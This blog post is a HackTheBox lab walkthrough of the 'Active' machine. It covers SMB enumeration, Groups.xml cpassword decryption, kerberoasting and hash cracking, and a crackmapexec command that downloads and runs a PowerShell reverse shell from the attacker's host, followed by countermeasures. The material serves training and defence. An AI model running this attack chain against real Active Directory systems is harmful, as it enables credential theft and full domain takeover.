r0kit's blog
Posts Tags Categories
r0kit's blog

Contents

HackTheBox - Active

 included in Hackthebox Infosec
   1903 words   9 minutes 

Active

/images/htb-active/active.png

Machine Release Date: July 28, 2018

Skills Learned

  • Active Directory Enumeration
  • SMB Enumeration
  • Active Directory groups.xml Decryption
  • Kerberoasting
  • Hash Cracking

Active Ports

sudo nmap -p53,88,135,139,389,445,464,593,636,3268,3269,5722,9389,49152,49153,49154,49155,49157,49158,49169,49171,49182 -T4 -sC -sV -oA nmap/full-tcp-version 10.10.10.100

Nmap scan report for 10.10.10.100
Host is up (0.036s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-09-10 19:30:22Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5722/tcp  open  msrpc         Microsoft Windows RPC
9389/tcp  open  mc-nmf        .NET Message Framing
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49169/tcp open  msrpc         Microsoft Windows RPC
49171/tcp open  msrpc         Microsoft Windows RPC
49182/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 2m50s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2020-09-10T19:31:19
|_  start_date: 2020-09-10T19:27:31

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Sep 10 15:30:33 2020 -- 1 IP address (1 host up) scanned in 188.70 seconds

SMB Enumeartion (Sensitive Groups.xml leaked from SYSVOL Replication)

I was able to list SMB shares with anonymous access:

$ smbclient -N -L //10.10.10.100/
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share
        Replication     Disk
        SYSVOL          Disk      Logon server share
        Users           Disk
SMB1 disabled -- no workgroup available

However, in this case, the only tool that worked for me was smbclient. I also only had access to the Replication share, so I mirrored it to my Kali machine:

$ smbclient -N //10.10.10.100/Replication
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\GPT.INI of size 23 as GPT.INI (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Group Policy\GPE.INI of size 119 as GPE.INI (0.4 KiloBytes/sec) (average 0.3 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 1098 as GptTmpl.inf (3.6 KiloBytes/sec) (average 1.7 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as Groups.xml (3.7 KiloBytes/sec) (average 2.1 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Registry.pol of size 2788 as Registry.pol (14.6 KiloBytes/sec) (average 4.3 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\GPT.INI of size 22 as GPT.INI (0.1 KiloBytes/sec) (average 3.4 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 3722 as GptTmpl.inf (11.0 KiloBytes/sec) (average 4.9 KiloBytes/sec)
smb: \> exit

I then recursively searched for some passwords:

$ grep -RiE 'pwd|passw' *
Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml:<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>

The Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml file had some credentials in it. After briefly researching the Groups.xml file, I learned that Microsoft publicly leaked the decryption key for the password. I modified the ruby script from this site to decrypt the password:

$ ruby decrypt-groupscpassword.rb
decrypt-groupscpassword.rb:14: warning: constant OpenSSL::Cipher::Cipher is deprecated
GPPstillStandingStrong2k18

At this point, the password for the SVC_TGS user should be GPPstillStandingStrong2k18. I verified that I could login as that user:

$ cme smb 10.10.10.100 -u SVC_TGS -p GPPstillStandingStrong2k18
SMB         10.10.10.100    445    DC               [*] Windows 6.1 Build 7601 x64 (name:DC) (domain:ACTIVE) (signing:True) (SMBv1:False)
SMB         10.10.10.100    445    DC               [+] ACTIVE\SVC_TGS:GPPstillStandingStrong2k18

I attempted to execute commands over SMB, but that didn’t work, so I enumerated more SMB shares since I had more privileges now:

$ smbmap -u SVC_TGS -p GPPstillStandingStrong2k18 -H 10.10.10.100
[+] IP: 10.10.10.100:445        Name: 10.10.10.100
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    NO ACCESS       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share
        Replication                                             READ ONLY
        SYSVOL                                                  READ ONLY       Logon server share
        Users                                                   READ ONLY

Great! Now I should be able to access the Users share!

sudo mount -t cifs -o 'username=SVC_TGS,password=GPPstillStandingStrong2k18' //10.10.10.100/Users Users

After mounting the Users share, I was able to enumerate it for the user.txt flag:

kali@kali:~/htb/boxes/active/smb$ find Users/ -name user.txt -ls 2>/dev/null
      131      1 -rwxr-xr-x   1 root     root           34 Jul 21  2018 Users/SVC_TGS/Desktop/user.txt
kali@kali:~/htb/boxes/active/smb$ cat Users/SVC_TGS/Desktop/user.txt
86d67d8ba232bb6a254aa4d10159e983

Privilege Escalation (Kerberoasting the Service Account)

I didn’t find anything too interesting after enumerating the SMB shares I had access to as the SVC_TGS user. With these new credentials, I was able to dump the active.htb Active Directory forest:

ldapsearch -x -h 10.10.10.100 -D 'SVC_TGS' -w 'GPPstillStandingStrong2k18' -b 'dc=active,dc=htb' > active.htb

Since I was able to enumerate active directory, this meant that I could enumerate for user accounts that also had service principal names (SPNs):

$ ldapsearch -x -h 10.10.10.100 -D 'SVC_TGS' -w 'GPPstillStandingStrong2k18' -b 'dc=active,dc=htb' '(&(objectClass=user)(objectCategory=user)(servicePrincipalName=*))'
# extended LDIF
#
# LDAPv3
# base <dc=active,dc=htb> with scope subtree
# filter: (&(objectClass=user)(objectCategory=user)(servicePrincipalName=*))
# requesting: ALL
#

# Administrator, Users, active.htb
dn: CN=Administrator,CN=Users,DC=active,DC=htb
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Administrator
description: Built-in account for administering the computer/domain
distinguishedName: CN=Administrator,CN=Users,DC=active,DC=htb
instanceType: 4
whenCreated: 20180718184911.0Z
whenChanged: 20200910202350.0Z
uSNCreated: 8196
memberOf: CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb
memberOf: CN=Domain Admins,CN=Users,DC=active,DC=htb
memberOf: CN=Enterprise Admins,CN=Users,DC=active,DC=htb
memberOf: CN=Schema Admins,CN=Users,DC=active,DC=htb
memberOf: CN=Administrators,CN=Builtin,DC=active,DC=htb
uSNChanged: 90160
name: Administrator
objectGUID:: jnHKJRJzf0aVWkxPEJY8Hg==
userAccountControl: 66048
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 131774446554773106
lastLogoff: 0
lastLogon: 131774446606565197
logonHours:: ////////////////////////////
pwdLastSet: 131764144003517228
primaryGroupID: 513
objectSid:: AQUAAAAAAAUVAAAArxktGAS1AL49Gv129AEAAA==
adminCount: 1
accountExpires: 0
logonCount: 33
sAMAccountName: Administrator
sAMAccountType: 805306368
servicePrincipalName: active/CIFS:445
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=active,DC=htb
isCriticalSystemObject: TRUE
dSCorePropagationData: 20180718203435.0Z
dSCorePropagationData: 20180718201454.0Z
dSCorePropagationData: 20180718190545.0Z
dSCorePropagationData: 20180718190545.0Z
dSCorePropagationData: 16010101000000.0Z
lastLogonTimestamp: 132442430302623697
msDS-SupportedEncryptionTypes: 0

# krbtgt, Users, active.htb
dn: CN=krbtgt,CN=Users,DC=active,DC=htb
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: krbtgt
description: Key Distribution Center Service Account
distinguishedName: CN=krbtgt,CN=Users,DC=active,DC=htb
instanceType: 4
whenCreated: 20180718185035.0Z
whenChanged: 20180718190545.0Z
uSNCreated: 12324
memberOf: CN=Denied RODC Password Replication Group,CN=Users,DC=active,DC=htb
uSNChanged: 12739
showInAdvancedViewOnly: TRUE
name: krbtgt
objectGUID:: 56HXQ6alq0mC0OJOdHL4jQ==
userAccountControl: 514
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 0
lastLogoff: 0
lastLogon: 0
pwdLastSet: 131764134369720307
primaryGroupID: 513
objectSid:: AQUAAAAAAAUVAAAArxktGAS1AL49Gv129gEAAA==
adminCount: 1
accountExpires: 9223372036854775807
logonCount: 0
sAMAccountName: krbtgt
sAMAccountType: 805306368
servicePrincipalName: kadmin/changepw
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=active,DC=htb
isCriticalSystemObject: TRUE
dSCorePropagationData: 20180718190545.0Z
dSCorePropagationData: 16010101000000.0Z

# search reference
ref: ldap://ForestDnsZones.active.htb/DC=ForestDnsZones,DC=active,DC=htb

# search reference
ref: ldap://DomainDnsZones.active.htb/DC=DomainDnsZones,DC=active,DC=htb

# search reference
ref: ldap://active.htb/CN=Configuration,DC=active,DC=htb

# search result
search: 2
result: 0 Success

# numResponses: 6
# numEntries: 2
# numReferences: 3

In the case above, both the Administrator, and krbtgt users were user accounts associated with an SPN. At this point, I was able to request Kerberos TGS (ticket-granting service) tickets tied to the SPNs and extract their hashes. Since their hashes are encrypted with the corresponding user’s password, I might be able to crack them with an offline brute force attack to compromise the account and escalate my privileges. This attack is known as kerberoasting.

I used the GetUserSPNs.py script from the impacket suite to achieve this:

$ python3 ~/tools/impacket/examples/GetUserSPNs.py -dc-ip 10.10.10.100 -outputfile active.tgsrep active.htb/SVC_TGS:GPPstillStandingStrong2k18
Impacket v0.9.22.dev1+20200826.101917.9485b0c2 - Copyright 2020 SecureAuth Corporation

ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40.351723  2018-07-30 13:17:40.656520

The hash from the TGS was saved in the active.tgsrep file. I then searched for the proper mode to run hashcat in so that I could crack it:

kali@kali:~/htb/boxes/active/kerberos$ ls
active.tgs
kali@kali:~/htb/boxes/active/kerberos$ less active.tgs
kali@kali:~/htb/boxes/active/kerberos$ hashcat --example-hashes | grep -iC1 'tgs'
MODE: 13100
TYPE: Kerberos 5, etype 23, TGS-REP
HASH: $krb5tgs$23$*user$realm$test/spn*$b548e10f5694ae018d7ad63c257af7dc$35e8e45658860bc31a859b41a08989265f4ef8afd75652ab4d7a30ef151bf6350d879ae189a8cb769e01fa573c6315232b37e4bcad9105520640a781e5fd85c09615e78267e494f433f067cc6958200a82f70627ce0eebc2ac445729c2a8a0255dc3ede2c4973d2d93ac8c1a56b26444df300cb93045d05ff2326affaa3ae97f5cd866c14b78a459f0933a550e0b6507bf8af27c2391ef69fbdd649dd059a4b9ae2440edd96c82479645ccdb06bae0eead3b7f639178a90cf24d9a
PASS: hashcat
--
MODE: 19600
TYPE: Kerberos 5, etype 17, TGS-REP
HASH: $krb5tgs$17$srv_http$synacktiv.local$849e31b3db1c1f203fa20b85$948690f5875125348286ad3346d27b43eaabc71896b620c16de7ddcdbd561628c650c508856a3f574261948b6db4b48332d30536e978046a423ad4368f9a69b4dc4642dab4e0d475d8299be718fd6f98ac85a771b457b2453e78c9411dfce572b19660fe7a5a8246d9b2a91ea2f14d1986ea0a77ecf9b8330bc8fd9ab540bcf46b74c5aa7005cfccd89ec05f66aeab30c6b2bf8595cf6c9a1b68ad885258850c4b1dd9265f270fb2af52fd76c16246df51ea67efc58a65c345686c84e43642febe908a
PASS: hashcat
--
MODE: 19700
TYPE: Kerberos 5, etype 18, TGS-REP
HASH: $krb5tgs$18$srv_http$synacktiv.local$16ce51f6eba20c8ee534ff8a$57d07b23643a516834795f0c010da8f549b7e65063e5a367ca9240f9b800adad1734df7e7d5dd8307e785de4f40aacf901df41aa6ce695f8619ec579c1fa57ee93661cf402aeef4e3a42e7e3477645d52c09dc72feade03512dffe0df517344f673c63532b790c242cc1d50f4b4b34976cb6e08ab325b3aefb2684262a5ee9faacb14d059754f50553be5bfa5c4c51e833ff2b6ac02c6e5d4c4eb193e27d7dde301bd1ddf480e5e282b8c27ef37b136c8f140b56de105b73adeb1de16232fa1ab5c9f6
PASS: hashcat

In this case, the mode is 13100 since the SPN secet in the TGS belonged to a user account.

S D:\hashcat\hashcat-6.0.0> .\hashcat.exe -a 0 -m 13100 ..\hashes\active.kerberoast ..\wordlists\rockyou.txt
hashcat (v6.0.0) starting...

* Device #1: WARNING! Kernel exec timeout is not disabled.
             This may cause "CL_OUT_OF_RESOURCES" or related errors.
             To disable the timeout, see: https://hashcat.net/q/timeoutpatch
* Device #2: WARNING! Kernel exec timeout is not disabled.
             This may cause "CL_OUT_OF_RESOURCES" or related errors.
             To disable the timeout, see: https://hashcat.net/q/timeoutpatch
* Device #3: Unstable OpenCL driver detected!

This OpenCL driver has been marked as likely to fail kernel compilation or to produce false negatives.
You can use --force to override this, but do not report related errors.

nvmlDeviceGetFanSpeed(): Not Supported

CUDA API (CUDA 11.0)
====================
* Device #1: GeForce GTX 1650 with Max-Q Design, 3323/4096 MB, 16MCU

OpenCL API (OpenCL 1.2 CUDA 11.0.208) - Platform #1 [NVIDIA Corporation]
========================================================================
* Device #2: GeForce GTX 1650 with Max-Q Design, skipped

OpenCL API (OpenCL 2.1 ) - Platform #2 [Intel(R) Corporation]
=============================================================
* Device #3: Intel(R) UHD Graphics 630, skipped

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 345 MB

Dictionary cache hit:
* Filename..: ..\wordlists\rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

$krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$e5e625443e6088697a4d053026dc6a99$e3416cb2632322aa88f5ba5519babfff07ef4cafd0c288f604532ac4cb3c8661d74ba62854919d73b4020cfc8fdca5c3e90bff6e3f03321544564939eebc562f88e01f6d43716f1031dab974d745587803a4b730b3e272958c126b2a857a1ed68452902bc869b787f0c1684370f54d96831d1a31fd31eca50c3a6f926d7e8b2fd34134ca3cdc19490a0c7e8a4a84706146f616bb6823fe9c777bb823825d0a1e5cd716bb52537f52e4c94c2a87956f69e4335f772479f293f23f24b30bbf2ffadb243e161d8fbc9b1f17a5952434618fcc870b7b1ad687c41134fcf24d414346e925185d5d94819a6e4fa086c0421c2d6123d45977abd70c79fbbf7d454719bb3bc76fdd3dab810416456378b0638d743ea1b832a0e3f7d681a28f6804d540a6a2527aa483b143cef087a5fb213d1da831f0f433031d99717297593e028bfa74647007a8615fd112c30e23a3632e099de24246f05e61c316f16f81c41a47650da911a81113db5bdb14671dec9f0813ff57a3f96a96ad8e83ce3ca1484cb1818ef3c97ec03ceb6f5c1d0aee82ca6e59c9cb807c458bc675dc245f6e541144645b1fb28940a77254208ee6029092f9316bf76e49c44ad713ff33a943d275f19501f98f99b45aec6a526e60a1883dfac77e6ea04c9a501bd304d7d1ee1411cc84f298d66113f4dd895254552ff39b05e4b44db21f93ec835a6a7eca9f74802fd8b0626375e105ef86cfc3a03967cc1fa5b90a05c69aafb6fde44aec8b774f6bfa39487a24ce9e087d07548db1fefc5623de7cd73c8f87669b7c92601c51a1d42a85a3c0a38d4f705bd4a76db42c76c21892f7cff143e185180261dee5de58211be7907c81184bccb6caafb534091c4b782dd9524dfe95d7e73ef7a6e4d82e9bdcfbc481b82d5c7ac61e117c74646b1452c285f5de33a81eddbcff262792643853f792002ef176aa9cc71b322c5c7127549892a345a9af8d7a4c44cdb351366af9585734c7957d620118b370c23f6227734e45d1405187aaf038f14bf0937fec7b7b39ae8f96c077edd1b047ceda6e43d8d78923dfc15d1f8550daf8f68df815a951381c8a4866a316cb52841d2f8e7345ef2ab14be6c0eaad1516e4a8b2f3c92ff94156b33cab056da7a54d5249db4791324552ac1f05e09354415234eb6a03096c5c0fbee0849287705d504424b8f4335baa9590d53e159f1e64e2d8cb538c2d591fba4b57220c699ef0710b9e667cbf4ff56475ca468b03ac3289:Ticketmaster1968

Session..........: hashcat
Status...........: Cracked
Hash.Name........: Kerberos 5, etype 23, TGS-REP
Hash.Target......: $krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~4...ac3289
Time.Started.....: Thu Sep 10 17:18:56 2020 (3 secs)
Time.Estimated...: Thu Sep 10 17:18:59 2020 (0 secs)
Guess.Base.......: File (..\wordlists\rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  4220.0 kH/s (8.20ms) @ Accel:256 Loops:1 Thr:64 Vec:1
Recovered........: 1/1 (100.00%) Digests
Progress.........: 10747904/14344385 (74.93%)
Rejected.........: 0/10747904 (0.00%)
Restore.Point....: 10485760/14344385 (73.10%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: XiaoNianNian -> PINKPIGS
Hardware.Mon.#1..: Temp: 53c Util: 39% Core:1875MHz Mem:3500MHz Bus:16

Started: Thu Sep 10 17:18:48 2020
Stopped: Thu Sep 10 17:18:59 2020

At this point, I had cracked the Administrator’s password Ticketmaster1968. I then used crackmapexec and the Invoke-PowerShellTcp.ps1 script from the nishang post exploitation framework, to invoke a PowerShell command to download Invoke-PowerShellTcp.ps1 from my Kali machine and execute it to get a reverse necat powershell session. This would allow me to execute commands on behalf of the Administrator:

$ sudo crackmapexec smb 10.10.10.100 -u Administrator -p Ticketmaster1968 -X 'iex(New-Object System.Net.WebClient).DownloadString("http://10.10.14.24:8000/Invoke-PowerShellTcp.ps1")'
SMB         10.10.10.100    445    DC               [*] Windows 6.1 Build 7601 x64 (name:DC) (domain:ACTIVE) (signing:True) (SMBv1:False)
SMB         10.10.10.100    445    DC               [+] ACTIVE\Administrator:Ticketmaster1968 (Pwn3d!)

$ rlwrap ncat -nlvp 2001
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::2001
Ncat: Listening on 0.0.0.0:2001
Ncat: Connection from 10.10.10.100.
Ncat: Connection from 10.10.10.100:52363.

Windows PowerShell running as user Administrator on DC
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\> whoami
active\administrator
PS C:\> cd Users\Administrator\Desktop
PS C:\Users\Administrator\Desktop> gc root.txt
b5fc76d1d6b91d77b2fbf2d54d0f708b

As seen above, I was able to access the root.txt, indicating a full compromise of the system.

Countermeasures

  • When replicating the Active Directory SYSVOL share, make sure to place proper access controls on it rather than allowing anonymous users to access it.
  • Set long and complex passwords for service accounts (i.e. at least 28 random alphanumeric and special characters).
  • Prefer creating dedicated low privileged groups for service accounts rather than tying them to the Administrator’s account.
  • Configure logging to detect kerberoasing activity by enabling the Audit Kerberos Service Ticket Operations feature. You can read more about it here.
Updated on 2020-09-12
 Active Directory EnumerationSmb EnumerationActive Directory Groups.xml DecryptionActive Directory MisconfigurationKerberoastingHash Cracking
Back | Home